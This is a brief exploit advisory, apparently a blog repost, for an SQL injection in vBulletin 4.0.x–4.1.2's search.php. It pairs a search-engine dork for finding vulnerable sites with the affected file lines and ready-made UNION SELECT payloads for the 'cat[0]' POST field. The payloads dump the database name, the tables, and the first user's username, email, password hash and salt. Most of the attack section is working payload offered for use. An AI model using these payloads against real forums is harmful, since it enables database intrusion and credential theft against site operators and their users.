| Filename | vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability |
| Permission | rw-r--r-- |
| Author | amiqmuzad |
| Date and Time | 3/16/2012 |
| Label | ./SQLi |
| Action |
= = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =
Product: http://www.vbulletin.com/
Version: 4.0.x
Dork : inurl:"search.php?search_type=1"
--------------------------
# ~Vulnerable Codes~ #
--------------------------
/vb/search/searchtools.php - line 715;
/packages/vbforum/search/type/socialgroup.php - line 201:203;
--------------------------
# ~Exploit~ #
--------------------------
POST data on "Search Multiple Content Types" => "groups"
&cat[0]=1) UNION SELECT database()#
&cat[0]=1) UNION SELECT table_name FROM information_schema.tables#
&cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt ) FROM user WHERE userid=1#
= = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =
0 komentar:
Posting Komentar